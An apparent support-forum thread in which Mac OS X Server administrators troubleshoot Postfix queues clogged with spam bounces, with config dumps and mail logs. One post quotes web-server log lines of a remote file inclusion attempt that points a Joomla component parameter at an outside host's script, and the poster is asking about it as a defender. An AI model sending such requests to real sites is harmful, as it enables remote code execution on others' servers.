Mail Queue Filling Up - Spam?
Hi All,
Over the weekend the mail queue in SA filled up. This morning some users where complaining about outgoing messages not being delivered. When I checked the mail queue it had about 500 messages in it. All of them looked liked spam. When I deleted them, outgoing messages started being delivered.
I have no idea why that would happen. Could it mean a hacked machine on the network? I've turned off all of my window's machines overnight to see what happens.
here is my config file.
mail:~ warnersmith$ postconf -n
alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
debugpeerlevel = 2
enableserveroptions = yes
html_directory = no
inet_interfaces = all
localrecipientmaps =
luser_relay = postofficebox
mail_owner = postfix
mailboxsizelimit = 0
mailbox_transport = cyrus
mailq_path = /usr/bin/mailq
manpage_directory = /usr/share/man
mapsrbldomains =
messagesizelimit = 20971520
mydestination = $myhostname,localhost.$mydomain,mail.sk.com,66.XXX.8.132,10.0.0.132,sk.com,skde sign.com
mydomain = sk.com
mydomain_fallback = localhost
myhostname = sk.com
mynetworks = 127.0.0.1/32,10.0.0.1/32,206.XXX.192.99
mynetworks_style = host
newaliases_path = /usr/bin/newaliases
ownerrequestspecial = no
queue_directory = /private/var/spool/postfix
readme_directory = /usr/share/doc/postfix
recipient_delimiter = +
relayhost = mail.chrl.twtelecom.net
sample_directory = /usr/share/doc/postfix/examples
sendmail_path = /usr/sbin/sendmail
setgid_group = postdrop
smtpdclientrestrictions = permit_mynetworks hash:/etc/postfix/smtpdreject rejectrblclient sbl.spamhaus.org permit
smtpdpw_server_securityoptions = gssapi,cram-md5,login
smtpdrecipientrestrictions = permitsasl_authenticated,permit_mynetworks,reject_unauthdestination,permit
smtpdsasl_authenable = yes
smtpdtls_certfile = /etc/postfix/server.pem
smtpdtls_keyfile = $smtpdtls_certfile
smtpduse_pwserver = yes
unknownlocal_recipient_rejectcode = 550
MacBook Pro 2.0 GHz 1 GB RAM Mac OS X (10.4.6)
Thanks Jeff. I think the code injection maybe it. I have the server set to relay all outgoing messages to our ISP's mail server. When I look at the messages in the mail queue, all of them seem to be bounce backs from the ISP (domain name does not exist.)
When I look at the mail log for one the messages with the ID of 39E33163839, I see:
Oct 10 13:20:11 mail postfix/smtpd[1697]: connect from unknown[10.0.0.45]
Oct 10 13:20:11 mail postfix/smtpd[1697]: 5EB9115C71D: client=unknown[10.0.0.45]
Oct 10 13:20:11 mail postfix/cleanup[1698]: 5EB9115C71D: message-id=<[email protected]>
Oct 10 13:20:11 mail postfix/qmgr[4726]: 5EB9115C71D: from=<[email protected]>, size=1904, nrcpt=1 (queue active)
Oct 10 20:11:02 mail postfix/qmgr[4726]: C6C32162E2F: from=, size=28300, nrcpt=1 (queue active)
Oct 10 20:11:02 mail postfix/smtp[13214]: C6C32162E2F: host relay.mail.twtelecom.net[216.136.102.250] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
Oct 10 20:11:03 mail postfix/smtp[13214]: C6C32162E2F: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.54.204.190], delay=3698, status=deferred (host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
Oct 10 20:11:49 mail postfix/smtpd[13189]: connect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:50 mail postfix/smtpd[13189]: 37C60163818: client=c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:50 mail postfix/cleanup[13178]: 37C60163818: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
Oct 10 20:11:51 mail postfix/qmgr[4726]: 37C60163818: from=<[email protected]>, size=26446, nrcpt=1 (queue active)
Oct 10 20:11:51 mail postfix/smtpd[13189]: disconnect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:55 mail postfix/smtpd[13182]: connect from localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/smtpd[13182]: F29EA163837: client=localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/cleanup[13178]: F29EA163837: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
Oct 10 20:11:56 mail postfix/smtpd[13182]: disconnect from localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: from=<[email protected]>, size=27040, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/smtp[13179]: 37C60163818: to=<[email protected]>, relay=127.0.0.1[127.0.0.1], delay=6, status=bounced (host 127.0.0.1[127.0.0.1] said: 550 5.7.1 Message content rejected, UBE, id=13135-02 (in reply to end of DATA command))
Oct 10 20:11:56 mail postfix/cleanup[13178]: 39E33163839: message-id=<[email protected]>
Oct 10 20:11:56 mail postfix/qmgr[4726]: 39E33163839: from=, size=28311, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/qmgr[4726]: 37C60163818: removed
Oct 10 20:11:56 mail postfix/pipe[13184]: F29EA163837: to=<[email protected]>, relay=cyrus, delay=1, status=sent (sk.com)
Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: removed
Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.136.95.10], delay=0, status=deferred (host relay.mail.twtelecom.net[216.136.95.10] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
When I look at the HTTPD logs for that same minute, I see:
69.231.131.52 - - [10/Oct/2006:14:20:11 -0400] "GET /pages/facility_02.html HTTP/1.1" 200 12193
216.120.232.145 - - [10/Oct/2006:20:11:09 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
194.52.202.141 - - [10/Oct/2006:20:11:36 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.3.jpg HTTP/1.1" 200 5338
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.4.jpg HTTP/1.1" 200 6872
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.5.jpg HTTP/1.1" 200 3360
The line "//components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -" seem to be that code injection. We don't have a file named sitemap.xml.php on our website.
Am I correct that this is a code injection?
I have three site running on this server. One is a plain old static site for the company it does not use PHP. One is webmail that came with OS X. The final one is an file storage site that does use PHP. It's a commercial code called Copper Project. I've turned off the site overnight to see if this still happens.
The link in in Jeff's post seems to suggest a simple fix. However, I know nothing about PHP programing, so this is beyond me.
Thanks
Henry
MacBook Pro 2.0 GHz 1 GB RAM Mac OS X (10.4.6)
Similar Messages
-
Outgoing mail queue fills with spam
I remember reading about how to fix this before - but cannot find the details now.
I have a server that is trying to send mail to non existant domains or non existant e-mail addressed. the mail is not originating from clients.
Typical entry in the mail queue is
Message ID: 60D7987570
Date: Thu Aug 17 06:18:36
Size: 34446
Sender: MAILER-DAEMON
Recipient(s) & Status:
[email protected]:
host mail.cncnet.net[210.53.130.195] said: 450 4.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table (in reply to RCPT TO command
how can I sent the mail server up to just ditch this stuff in the first place.
TimHere is an extract from the logs. I think I understand this now and it works as it should - but perhaps you could confirm.
This message is clearly not stuck in the outgoing queue. From what I can see mail is received from a backup mail relay for a non existent user on this server. When we try to reject it back to sender, if the sender rejects with 550 we bin it.
I guess the problem is what to do when the receiving mail server fails to respond? I think eventually it times out and we delete the message. Is that correct?
Aug 18 15:27:00 server postfix/cleanup[20819]: 9F7AAE92EB: message-id=<000001c6c2d2$2aae8940$d73fa8c0@hpcsece>
Aug 18 15:27:00 server postfix/qmgr[17315]: 9F7AAE92EB: from=<[email protected]>, size=3353, nrcpt=1 (queue active)
Aug 18 15:27:00 server postfix/smtpd[20816]: disconnect from scanner.datacenta.net[217.33.105.206]
Aug 18 15:27:16 server postfix/smtpd[20827]: connect from localhost[127.0.0.1]
Aug 18 15:27:16 server postfix/smtpd[20827]: B7FA3E930E: client=localhost[127.0.0.1]
Aug 18 15:27:16 server postfix/cleanup[20819]: B7FA3E930E: message-id=<000001c6c2d2$2aae8940$d73fa8c0@hpcsece>
Aug 18 15:27:16 server postfix/qmgr[17315]: B7FA3E930E: from=<[email protected]>, size=3905, nrcpt=1 (queue active)
Aug 18 15:27:16 server postfix/smtpd[20827]: disconnect from localhost[127.0.0.1]
Aug 18 15:27:17 server postfix/smtp[20820]: 9F7AAE92EB: to=<[email protected]>, relay=127.0.0.1[127.0.0.1], delay=18, status=sent (250 2.6.0 Ok, id=20277-06, from MTA: 250 Ok: queued as B7FA3E930E)
Aug 18 15:27:17 server postfix/qmgr[17315]: 9F7AAE92EB: removed
Aug 18 15:27:17 server postfix/lmtp[20828]: B7FA3E930E: to=<[email protected]>, relay=/var/imap/socket/lmtp[/var/imap/socket/lmtp], delay=1, status=bounced (host /var/imap/socket/lmtp[/var/imap/socket/lmtp] said: 550-Mailbox unknown. Either there is no mailbox associated with this 550-name or you do not have authorization to see it. 550 5.1.1 User unknown (in reply to RCPT TO command))
Aug 18 15:27:17 server postfix/cleanup[20819]: 38178E9310: message-id=<[email protected]>
Aug 18 15:27:17 server postfix/qmgr[17315]: 38178E9310: from=, size=6025, nrcpt=1 (queue active)
Aug 18 15:27:17 server postfix/qmgr[17315]: B7FA3E930E: removed
Aug 18 15:27:19 server postfix/smtp[20831]: 38178E9310: to=<[email protected]>, relay=bx1.techsolsc.com[65.5.144.18], delay=2, status=bounced (host bx1.techsolsc.com[65.5.144.18] said: 550 <[email protected]>: Recipient address rejected: Unknown user (in reply to RCPT TO command))
Aug 18 15:27:19 server postfix/qmgr[17315]: 38178E9310: removed -
Mail queue filling up, delivery real slow
mail server is: 10.4.2 running on a dual 2 GHz Xserve 1 gig RAM
2 hard drives. 1 boot, 1 mail store
my mail queue is filling up with messages that can't be delivered. bad address usually. not sure why they make into the queue in the first place.
The queue reaches as high a 7000+ messages.
This is really killing my server. Can anyone shed some light??
here is postconf output:
2bounce_notice_recipient = postmaster
access_map_reject_code = 554
address_verify_default_transport = $default_transport
address_verify_local_transport = $local_transport
address_verify_map =
address_verify_negative_cache = yes
address_verify_negative_expire_time = 3d
address_verify_negative_refresh_time = 3h
address_verify_poll_count = 3
address_verify_poll_delay = 3s
address_verify_positive_expire_time = 31d
address_verify_positive_refresh_time = 7d
address_verify_relay_transport = $relay_transport
address_verify_relayhost = $relayhost
address_verify_sender = postmaster
address_verify_service_name = verify
address_verify_transport_maps = $transport_maps
address_verify_virtual_transport = $virtual_transport
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
allow_mail_to_commands = alias, forward
allow_mail_to_files = alias, forward
allow_min_user = no
allow_percent_hack = yes
allow_untrusted_routing = no
alternate_config_directories =
always_bcc =
append_at_myorigin = yes
append_dot_mydomain = yes
application_event_drain_time = 100s
backwards_bounce_logfile_compatibility = yes
berkeley_db_create_buffer_size = 16777216
berkeley_db_read_buffer_size = 131072
best_mx_transport =
biff = yes
body_checks =
body_checks_size_limit = 51200
bounce_notice_recipient = postmaster
bounce_queue_lifetime = 5d
bounce_service_name = bounce
bounce_size_limit = 50000
broken_sasl_auth_clients = no
canonical_maps =
cleanup_service_name = cleanup
command_directory = /usr/sbin
command_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
command_time_limit = 1000s
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
daemon_timeout = 18000s
debug_peer_level = 2
debug_peer_list =
default_database_type = hash
default_delivery_slot_cost = 5
default_delivery_slot_discount = 50
default_delivery_slot_loan = 3
default_destination_concurrency_limit = 6
default_destination_recipient_limit = 50
default_extra_recipient_limit = 1000
default_minimum_delivery_slots = 3
default_privs = nobody
default_process_limit = 20
default_rbl_reply = $rbl_code Service unavailable; $rbl_class [$rbl_what] blocked using $rbl_domain${rbl_reason?; $rbl_reason}
default_recipient_limit = 10000
default_transport = smtp
default_verp_delimiters = +=
defer_code = 450
defer_service_name = defer
defer_transports =
delay_notice_recipient = postmaster
delay_warning_time = 0h
deliver_lock_attempts = 20
deliver_lock_delay = 1s
disable_dns_lookups = no
disable_mime_input_processing = no
disable_mime_output_conversion = no
disable_verp_bounces = no
disable_vrfy_command = no
dont_remove = 0
double_bounce_sender = double-bounce
duplicate_filter_limit = 1000
empty_address_recipient = MAILER-DAEMON
enable_errors_to = no
enable_original_recipient = yes
enable_server_options = yes
error_notice_recipient = postmaster
error_service_name = error
expand_owner_alias = no
export_environment = TZ MAIL_CONFIG
fallback_relay =
fallback_transport =
fast_flush_domains = $relay_domains
fast_flush_purge_time = 7d
fast_flush_refresh_time = 12h
fault_injection_code = 0
flush_service_name = flush
fork_attempts = 5
fork_delay = 1s
forward_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
forward_path = $home/.forward${recipient_delimiter}${extension}, $home/.forward
hash_queue_depth = 1
hash_queue_names = incoming, active, deferred, bounce, defer, flush, hold, trace
header_address_token_limit = 10240
header_checks =
header_size_limit = 102400
helpful_warnings = yes
home_mailbox =
hopcount_limit = 50
html_directory = no
ignore_mx_lookup_error = no
import_environment = MAIL_CONFIG MAIL_DEBUG MAIL_LOGTAG TZ XAUTHORITY DISPLAY
in_flow_delay = 1s
inet_interfaces = all
initial_destination_concurrency = 4
invalid_hostname_reject_code = 501
ipc_idle = 100s
ipc_timeout = 3600s
ipc_ttl = 1000s
line_length_limit = 2048
lmtp_cache_connection = yes
lmtp_connect_timeout = 0s
lmtp_data_done_timeout = 600s
lmtp_data_init_timeout = 120s
lmtp_data_xfer_timeout = 180s
lmtp_destination_concurrency_limit = $default_destination_concurrency_limit
lmtp_destination_recipient_limit = $default_destination_recipient_limit
lmtp_lhlo_timeout = 300s
lmtp_mail_timeout = 300s
lmtp_quit_timeout = 300s
lmtp_rcpt_timeout = 300s
lmtp_rset_timeout = 120s
lmtp_sasl_auth_enable = no
lmtp_sasl_password_maps =
lmtp_sasl_security_options = noplaintext, noanonymous
lmtp_send_xforward_command = no
lmtp_skip_quit_response = no
lmtp_tcp_port = 24
lmtp_xforward_timeout = 300s
local_command_shell =
local_destination_concurrency_limit = 2
local_destination_recipient_limit = 1
local_recipient_maps =
local_transport = local:$myhostname
luser_relay = emailadmin
mail_name = Postfix
mail_owner = postfix
mail_release_date = 20040915
mail_spool_directory = /var/mail
mail_version = 2.1.5
mailbox_command =
mailbox_command_maps =
mailbox_delivery_lock = flock
mailbox_size_limit = 0
mailbox_transport = cyrus
mailq_path = /usr/bin/mailq
manpage_directory = /usr/share/man
maps_rbl_domains =
maps_rbl_reject_code = 554
masquerade_classes = envelope_sender, header_sender, header_recipient
masquerade_domains =
masquerade_exceptions =
max_idle = 100s
max_use = 100
maximal_backoff_time = 2700s
maximal_queue_lifetime = 36h
message_size_limit = 16777216
mime_boundary_length_limit = 2048
mime_header_checks = $header_checks
mime_nesting_limit = 100
minimal_backoff_time = 900s
multi_recipient_bounce_reject_code = 550
mydestination = $myhostname,localhost.$mydomain,myDomain.com,mail.myDomain.com
mydomain = myDomain.com
mydomain_fallback = localhost
myhostname = myDomain.com
mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
mynetworks_style = host
myorigin = $myhostname
nested_header_checks = $header_checks
newaliases_path = /usr/bin/newaliases
non_fqdn_reject_code = 504
notify_classes = resource, software
owner_request_special = no
parent_domain_matches_subdomains = debug_peer_list,fast_flush_domains,mynetworks,permit_mx_backup_networks,qmqpd_a uthorized_clients,relay_domains,smtpd_access_maps
permit_mx_backup_networks =
pickup_service_name = pickup
prepend_delivered_header = command, file, forward
process_id_directory = pid
propagate_unmatched_extensions = canonical, virtual
proxy_interfaces =
proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
qmgr_clog_warn_time = 300s
qmgr_fudge_factor = 100
qmgr_message_active_limit = 20000
qmgr_message_recipient_limit = 20000
qmgr_message_recipient_minimum = 10
qmqpd_authorized_clients =
qmqpd_error_delay = 1s
qmqpd_timeout = 300s
queue_directory = /private/var/spool/postfix
queue_file_attribute_count_limit = 100
queue_minfree = 0
queue_run_delay = 900s
queue_service_name = qmgr
rbl_reply_maps =
readme_directory = /usr/share/doc/postfix
receive_override_options =
recipient_bcc_maps =
recipient_canonical_maps =
recipient_delimiter = +
reject_code = 554
relay_clientcerts =
relay_destination_concurrency_limit = $default_destination_concurrency_limit
relay_destination_recipient_limit = $default_destination_recipient_limit
relay_domains = $mydestination
relay_domains_reject_code = 554
relay_recipient_maps =
relay_transport = relay
relayhost =
relocated_maps =
require_home_directory = no
resolve_dequoted_address = yes
resolve_null_domain = no
rewrite_service_name = rewrite
sample_directory = /usr/share/doc/postfix/examples
sender_based_routing = no
sender_bcc_maps =
sender_canonical_maps =
sendmail_path = /usr/sbin/sendmail
service_throttle_time = 60s
setgid_group = postdrop
show_user_unknown_table_name = yes
showq_service_name = showq
smtp_always_send_ehlo = yes
smtp_bind_address =
smtp_connect_timeout = 30s
smtp_data_done_timeout = 600s
smtp_data_init_timeout = 120s
smtp_data_xfer_timeout = 180s
smtp_defer_if_no_mx_address_found = no
smtp_destination_concurrency_limit = $default_destination_concurrency_limit
smtp_destination_recipient_limit = $default_destination_recipient_limit
smtp_enforce_tls = no
smtp_helo_name = $myhostname
smtp_helo_timeout = 300s
smtp_host_lookup = dns
smtp_line_length_limit = 990
smtp_mail_timeout = 300s
smtp_mx_address_limit = 0
smtp_mx_session_limit = 2
smtp_never_send_ehlo = no
smtp_pix_workaround_delay_time = 10s
smtp_pix_workaround_threshold_time = 500s
smtp_quit_timeout = 300s
smtp_quote_rfc821_envelope = yes
smtp_randomize_addresses = yes
smtp_rcpt_timeout = 300s
smtp_rset_timeout = 120s
smtp_sasl_auth_enable = no
smtp_sasl_password_maps =
smtp_sasl_security_options = noplaintext, noanonymous
smtp_sasl_tls_security_options = $var_smtp_sasl_opts
smtp_sasl_tls_verified_security_options = $var_smtp_sasl_tls_opts
smtp_send_xforward_command = no
smtp_skip_5xx_greeting = yes
smtp_skip_quit_response = yes
smtp_starttls_timeout = 300s
smtp_tls_CAfile =
smtp_tls_CApath =
smtp_tls_cert_file =
smtp_tls_cipherlist =
smtp_tls_dcert_file =
smtp_tls_dkey_file = $smtp_tls_dcert_file
smtp_tls_enforce_peername = yes
smtp_tls_key_file = $smtp_tls_cert_file
smtp_tls_loglevel = 0
smtp_tls_note_starttls_offer = no
smtp_tls_per_site =
smtp_tls_scert_verifydepth = 5
smtp_tls_session_cache_database =
smtp_tls_session_cache_timeout = 3600s
smtp_use_tls = no
smtp_xforward_timeout = 300s
smtpd_authorized_verp_clients = $authorized_verp_clients
smtpd_authorized_xclient_hosts =
smtpd_authorized_xforward_hosts =
smtpd_banner = $myhostname ESMTP $mail_name
smtpd_client_connection_count_limit = 50
smtpd_client_connection_limit_exceptions = $mynetworks
smtpd_client_connection_rate_limit = 0
smtpd_client_restrictions = check_recipient_access hash:/etc/postfix/access, permit_sasl_authenticated, permit_mynetworks, check_sender_access hash:/etc/postfix/whiteList, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_rbl_client dnsbl.njabl.org, reject_rbl_client sbl-xbl.spamhaus.org, reject_rbl_client bl.spamcop.net, reject_rbl_client cbl.abuseat.org
smtpd_data_restrictions =
smtpd_delay_reject = yes
smtpd_enforce_tls = no
smtpd_error_sleep_time = 1s
smtpd_etrn_restrictions =
smtpd_expansion_filter = \t\40!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghi jklmnopqrstuvwxyz{|}~
smtpd_hard_error_limit = 20
smtpd_helo_required = no
smtpd_helo_restrictions =
smtpd_history_flush_threshold = 100
smtpd_junk_command_limit = 100
smtpd_noop_commands =
smtpd_null_access_lookup_key =
smtpd_policy_service_max_idle = 300s
smtpd_policy_service_max_ttl = 1000s
smtpd_policy_service_timeout = 100s
smtpd_proxy_ehlo = $myhostname
smtpd_proxy_filter =
smtpd_proxy_timeout = 100s
smtpd_pw_server_security_options = login,plain,cram-md5,gssapi
smtpd_recipient_limit = 1000
smtpd_recipient_overshoot_limit = 1000
smtpd_recipient_restrictions = check_recipient_access hash:/etc/postfix/access, permit_mynetworks, permit_sasl_authenticated, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unauth_destination, check_sender_access hash:/etc/postfix/whiteList
smtpd_reject_unlisted_recipient = yes
smtpd_reject_unlisted_sender = no
smtpd_restriction_classes =
smtpd_sasl_application_name = smtpd
smtpd_sasl_auth_enable = yes
smtpd_sasl_exceptions_networks =
smtpd_sasl_local_domain =
smtpd_sasl_security_options = noanonymous
smtpd_sasl_tls_security_options = $smtpd_sasl_security_options
smtpd_sender_login_maps =
smtpd_sender_restrictions =
smtpd_soft_error_limit = 10
smtpd_starttls_timeout = 300s
smtpd_timeout = 300s
smtpd_tls_CAfile =
smtpd_tls_CApath =
smtpd_tls_ask_ccert = no
smtpd_tls_auth_only = no
smtpd_tls_ccert_verifydepth = 5
smtpd_tls_cert_file = /etc/certificates/mail.myDomain.com.crt
smtpd_tls_cipherlist =
smtpd_tls_dcert_file =
smtpd_tls_dh1024_param_file =
smtpd_tls_dh512_param_file =
smtpd_tls_dkey_file = $smtpd_tls_dcert_file
smtpd_tls_key_file = /etc/certificates/mail.myDomain.com.key
smtpd_tls_loglevel = 2
smtpd_tls_received_header = no
smtpd_tls_req_ccert = no
smtpd_tls_session_cache_database =
smtpd_tls_session_cache_timeout = 3600s
smtpd_tls_wrappermode = no
smtpd_use_pw_server = yes
smtpd_use_tls = yes
soft_bounce = no
stale_lock_time = 500s
strict_7bit_headers = no
strict_8bitmime = no
strict_8bitmime_body = no
strict_mime_encoding_domain = no
strict_rfc821_envelopes = no
sun_mailtool_compatibility = no
swap_bangpath = yes
syslog_facility = mail
syslog_name = postfix
tls_daemon_random_bytes = 32
tls_daemon_random_source =
tls_random_bytes = 32
tls_random_exchange_name = ${config_directory}/prng_exch
tls_random_prng_update_period = 60s
tls_random_reseed_period = 3600s
tls_random_source =
trace_service_name = trace
transport_maps =
transport_retry_time = 60s
trigger_timeout = 10s
undisclosed_recipients_header = To: undisclosed-recipients:;
unknown_address_reject_code = 450
unknown_client_reject_code = 450
unknown_hostname_reject_code = 450
unknown_local_recipient_reject_code = 550
unknown_relay_recipient_reject_code = 550
unknown_virtual_alias_reject_code = 550
unknown_virtual_mailbox_reject_code = 550
unverified_recipient_reject_code = 450
unverified_sender_reject_code = 450
verp_delimiter_filter = -=+
virtual_alias_domains = $virtual_alias_maps
virtual_alias_expansion_limit = 1000
virtual_alias_maps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
virtual_alias_recursion_limit = 1000
virtual_destination_concurrency_limit = $default_destination_concurrency_limit
virtual_destination_recipient_limit = $default_destination_recipient_limit
virtual_gid_maps =
virtual_mailbox_base =
virtual_mailbox_domains = hash:/etc/postfix/virtual_domains
virtual_mailbox_limit = 51200000
virtual_mailbox_lock = fcntl
virtual_mailbox_maps =
virtual_minimum_uid = 100
virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp
virtual_uid_maps =I do have a few Windows clients. They have up to date virus protection but they could very well be infected with some malware. I haven't had the chance to run SpyBot on them.
Sorry for the long postconf output.
I did requeue all the messages with postsuper -r. I also put them all on hold (postsuper -h) which allowed for new messages to be delivered as usual. Deleting the queue was not an option. I am pretty sure now that it was a spam dictionary attack. But I am still concerned that this would effectively bring the server down.
I looked into recipient restrictions but don't see any easy way to maintain an accurate list of my users. Is there a way to pull them from the LDAP directory? I guess I could do that with a perl script, shouldn't be too hard. Is there an easier way? Something built in?
Anyway the server is fine now. As I said I put all the messages on hold then slowly released them back into the active queue. Once the server was able to get over its hang up it chewed through the remaining messages ok. This still brought my server down pretty much the entire day. Not acceptable in most countries.
Any other ideas are welcome!
Thanks,
Josh
shorter postconf output:
alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
always_bcc =
bouncequeuelifetime = 4h
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
debugpeerlevel = 2
defaultdestination_concurrencylimit = 6
defaultprocesslimit = 20
enableserveroptions = yes
inet_interfaces = all
initialdestinationconcurrency = 15
localrecipientmaps =
luser_relay = emailadmin
mail_owner = postfix
mailboxsizelimit = 0
mailbox_transport = cyrus
mailq_path = /usr/bin/mailq
manpage_directory = /usr/share/man
mapsrbldomains =
maximalbackofftime = 2700s
maximalqueuelifetime = 36h
messagesizelimit = 16777216
minimalbackofftime = 900s
mydestination = $myhostname,localhost.$mydomain,myDomain.com
mydomain_fallback = localhost
myhostname = thestranger.com
mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
mynetworks_style = host
newaliases_path = /usr/bin/newaliases
ownerrequestspecial = no
queue_directory = /private/var/spool/postfix
queuerundelay = 900s
readme_directory = /usr/share/doc/postfix
recipient_delimiter = +
relayhost =
sample_directory = /usr/share/doc/postfix/examples
sendmail_path = /usr/sbin/sendmail
setgid_group = postdrop
smtpconnecttimeout = 15s
smtphelotimeout = 30s
smtpdclientrestrictions = checkrecipientaccess hash:/etc/postfix/access, permitsaslauthenticated, permit_mynetworks, checksenderaccess hash:/etc/postfix/whiteList, rejectinvalidhostname, rejectnon_fqdnsender, rejectnon_fqdnrecipient, rejectrblclient dnsbl.njabl.org, rejectrblclient sbl-xbl.spamhaus.org, rejectrblclient bl.spamcop.net, rejectrblclient cbl.abuseat.org
smtpdenforcetls = no
smtpdpw_server_securityoptions = login,plain,cram-md5,gssapi
smtpdrecipientrestrictions = checkrecipientaccess hash:/etc/postfix/access, permit_mynetworks, permitsaslauthenticated, rejectinvalidhostname, rejectnon_fqdnsender, rejectnon_fqdnrecipient, rejectunknown_senderdomain, rejectunauthdestination, checksenderaccess hash:/etc/postfix/whiteList
smtpdsasl_authenable = yes
smtpdtls_certfile = /etc/certificates//myDomain.com.crt
smtpdtls_keyfile = /etc/certificates/myDomain.com.key
smtpdtlsloglevel = 2
smtpduse_pwserver = yes
smtpdusetls = yes
unknownlocal_recipient_rejectcode = 550
virtualaliasmaps = hash:/etc/postfix/virtual,hash:/var/mailman/data/virtual-mailman
virtualmailboxdomains = hash:/etc/postfix/virtual_domains
virtual_transport = lmtp:unix:/Volumes/Mail/imap/socket/lmtp -
Mail queue filling up - Delivery Temporarily Suspended Connection Refused
About 2 hours ago we stopped getting any email from our server. The mail queue is filling up. If I click on one of the messages in queue, it gives me a message of "delivery temporarily suspended: connect to 127.0.0.1[127.0.0.1]: connection refused".
What happened????
Thanks,
RobertMy configuration was running fine for months but suddenly every night amavisd stops running (I suppose after mailbfr ran). I have to launch amavisd manually with +sudo /bin/launchctl load -w /System/Library/LaunchDaemons/org.amavis.amavisd.plist+ every day.
Maybe something is wrong with my org.amavis.amavisd.plist? Here is it:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>org.amavis.amavisd</string>
<key>OnDemand</key>
<false/>
<key>Program</key>
<string>/usr/bin/amavisd</string>
<key>ProgramArguments</key>
<array>
<string>amavisd</string>
<string>foreground</string>
</array>
<key>ServiceIPC</key>
<false/>
<key>UserName</key>
<string>_amavisd</string>
</dict>
</plist> -
Mail queue filling with errors, is something broken?
Back in SL, I was able to just look at the queue in server app and if it ever had anything in it, I knew it was a problem and I usually could deal with it.
But in ML, you have to issue "mailq" in terminal to see it. So I did that a lot when first set up, and everything seemed fine.
I just checked it recently and found hundreds of messages like this:
0C8AA2B7E2D6
9315 Sun Jan 4 09:14:13 [email protected]
(host 127.0.0.1[127.0.0.1] said: 451 4.5.0 Error in processing, id=76490-02-4, quar+notif FAILED: temporarily unable to quarantine: 451 4.5.0 Local delivery(1) to /Library/Server/Mail/Data/scanner/virusmails failed: Mailbox file /Library/Server/Mail/Data/scanner/virusmails is executable, refuse to deliver at (eval 102) line 219., id=76490-02-4 at /Applications/Server.app/Contents/ServerRoot/usr/bin/amavisd line 15343. (in reply to end of DATA command))
[email protected]
I delete them and it fills up again.
Can anyone please tell me what's happening here and how to fix it?
Thank a bunch,
ScottHere it is:
prepress:~ server2$ ls -dl /L*/Server/M*/D*/*/virus*
-rwxr-x--- 1 _amavisd _amavisd 548758857 Dec 18 10:42 /Library/Server/Mail/Data/scanner/virusmails
prepress:~ server2$
Thanks Linc! -
Mail Queue filling up with DSN failures
